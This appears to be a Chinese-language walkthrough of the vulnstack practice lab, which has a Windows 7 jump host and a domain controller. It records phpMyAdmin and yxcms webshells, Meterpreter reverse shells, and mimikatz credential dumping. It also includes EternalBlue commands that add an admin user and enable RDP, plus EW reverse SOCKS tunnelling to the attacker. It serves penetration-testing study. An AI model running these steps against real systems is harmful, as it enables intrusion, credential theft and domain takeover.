下載
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
靶場預設密碼
hongrisec@2019
環境搭建
win7作為跳板機,設定兩張網路卡
kali作為攻擊機,網路介面卡設定為VMnet8
而win2003與win2008設定為VMnet1
設定好後開啟虛擬機器
有些虛擬機器開啟後會提示密碼過期,改為123qwe.
win2k3
win2008
win7
kali
所以我各個裝置的ip分別為
攻擊機kali:192.168.187.128
邊緣靶機win7:
192.168.187.129
192.168.52.143
域控win server2008:
192.168.52.138
域成員
192.168.52.141
在設定ip時發現我的kali沒有ipv4地址,後面發現是物理機上的vmware DHCP service沒有啟動
再開啟win7裡面C盤的phpstudy(頭次登入win7需要重新登陸,否則phpstudy無法正常執行)
環境搭建完成
外網滲透
nmap掃描一下
可以看到80,3306埠開啟了服務
瀏覽器訪問192.168.187.129:80
發現phpstudy探針
dirsearch掃一掃
發現phpmyadmin頁面
嘗試了一下root/root,居然成功了
透過phpmyadmin管理後臺getshell思路有很多種,比如直接寫入一句話、建立表再匯出、慢查詢日誌等
sql查詢日誌
開啟global general_log
設定檔案位置
檢視
寫馬
訪問一下,寫入成功
蟻劍連線
遠端登入Win7
新增遠端桌面連線
關防火牆
新增賬戶、加進管理員組
rdesktop登入
新開一個終端,ping測試防火牆是否關閉,rdesktop 遠端連線3389
成功遠端連線!
透過Win7拿到域內許可權
新建使用者hack01雖然擁有win7管理許可權,但hack01只能查得到本機的資訊,它沒有域內的許可權,無法利用cmd查詢到關於域控的更多有效資訊
訪問yxcms
進入yxcms後臺
寫入一句話木馬
透過yxcms的版本資訊,可以搜尋相關的專案,進一步確認模板在專案中的位置
訪問http://192.168.187.129/yxcms/protected/apps/default/view/default/info.php
使用hackbar執行phpinfo
執行哥斯拉
哥斯拉新增shell,先test再add
enter 進入,可以檢視到這是一個域內使用者
內網滲透
反彈shell
上傳64.exe
kali開始監聽
哥斯拉執行64.exe
域內資訊收集(GOD\Administrator )
getuid查當前使用者
getuid 命令用於顯示當前會話的使用者名稱。
返回了 Server username: GOD\Administrator
Server: 這裡指的是目標主機或被控制的機器。
username: 這是當前 Meterpreter 會話的使用者標識。
GOD\Administrator: 表示當前會話的使用者是 Administrator,且該使用者屬於 GOD 域。
shell 收集資訊
hashdump 雜湊
使用者名稱:SID:LM雜湊:NTLM雜湊:::
三個賬號的LM雜湊aad3b435b51404eeaad3b435b51404ee和NTLM雜湊31d6cfe0d16ae931b73c59d7e0c089c0都是空密碼。
資訊整理
網路上可訪問的計算機列表:
\OWA
\ROOT-TVI862UBEH
\STU1
當前的域控制器
\owa.god.org
機器的ip:
ROOT-TVI862UBEH:192.168.52.141
OWA (owa.god.org ):192.168.52.138
kiwi獲取Kerberos 票據
“Kiwi” 在這裡指的是 mimikatz 的別稱,因為 mimikatz 的開發者 Benjamin DELPY 的網名是 “gentilkiwi”。因此,在安全社群中,人們有時會親切地將 mimikatz 稱為 “kiwi”。
mimikatz 是一款在安全研究和滲透測試領域廣泛使用的開源工具,它主要用於 Windows 系統。mimikatz 能夠執行多種與憑證訪問和憑證轉儲相關的操作,包括但不限於:
從記憶體中提取 Windows 憑據。
轉儲登入密碼。
模擬登入令牌。
從 LSA 記憶體中提取密碼雜湊。
建立和使用 Kerberos 票據。
獼猴桃(GOD\Administrator 提示非系統)
在 Meterpreter 會話中,載入 mimikatz 擴充套件(透過 load kiwi 命令)允許使用者直接在會話中執行 mimikatz 的各種功能。這為滲透測試人員提供了一個強大的工具,以幫助他們評估目標系統的安全性。
creds_all 檢索解析過的票據,提示不是系統,記住現在getuid顯示的是GOD\Administrator 。後面會呼叫msf進行提權。
msf(許可權提升到 SYSTEM 級別)+ 獼猴桃(獲取kbs)
上面getuid顯示的是GOD\Administrator ,這個時候想抓票據,提示Not running as SYSTEM, execution may fail,表明當前的會話或執行環境不是以 SYSTEM 使用者許可權執行的。
msf 命令 getsystem 嘗試將當前會話的許可權提升到 SYSTEM 級別。
SYSTEM 是 Windows 系統中許可權最高的使用者賬戶,擁有對系統完全的控制權。
getsystem提權後,getuid發生了變化: NT AUTHORITY\SYSTEM.
creds_kerberos 檢索 Kerberos 憑據(解析過的),成功拿到檢索 Kerberos 憑據,密碼123qwe.
shell(\system)驗證Administrator是否域管理員
猜測Administrator是域管理員,需要進入shell驗證下。
透過這些命令,可以獲取以下資訊:
會話已經獲得了 SYSTEM 級別的訪問許可權,這是 Windows 系統中最高的許可權級別。
“Domain Admins” 組的成員資訊,這對於瞭解域環境中的高許可權賬戶非常重要。
域的名稱是 god.org,這是一個組織內部用於身份驗證和資源管理的域。
MSF程序注入(遷移到GOD\Administrator)
MSF程序注入前提:需要生成一個木馬讓其上線,讓攻擊機連線上去,這裡前面已經生成好的木馬連上了
當前還是系統狀態NT AUTHORITY\SYSTEM,ps檢視所有程序以及相應的許可權。
migrate PID 遷移程序,這個pid是你選擇程序的id號,這裡我選了http,能轉到GOD\Administrator
程序遷移成功,getuid發生了改變GOD\Administrator。
shell驗證GOD\Administrator賬戶許可權
這裡能看到GOD\Administrator是有許可權訪問另外兩臺機子的資訊的,進一步驗證我們的猜測。
GOD\Administrator有域管理員許可權,rdesktop遠端顯示已登入。
攻擊上線
msf(新增路由+掛代理)
掛代理前必須加路由,msf模組post/multi/manage/autoroute
msf模組auxiliary/server/socks_proxy新增代理,run啟動。
jobs檢視代理已掛起,根據上面的配置編輯檔案/etc/proxychains4.conf
proxychains nmap 掃描
發現都開放了445埠,嘗試一下永恆之藍
可以看到兩臺主機都有永恆之藍的漏洞
使用模組command
新增使用者
use 2
set rhosts 192.168.52.138
set command net user hacker 123456hack! /add
run
將使用者新增到管理員組
set command net localgroup Administrators hacker /add
run
開啟遠端桌面
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run
代理內網
git clone https://github.com/idlefire/ew.git
./ew_for_linux64 -s rcsocks -l 5656 -e 9999
ew_for_Win.exe -s rssocks -d 192.168.32.128 -e 9999
開全域性代理:setg proxies socks5:127.0.0.1:5656
參考文章
https://blog.csdn.net/weixin_46022776/article/details/139295589
https://blog.csdn.net/woshicainiao666/article/details/135396948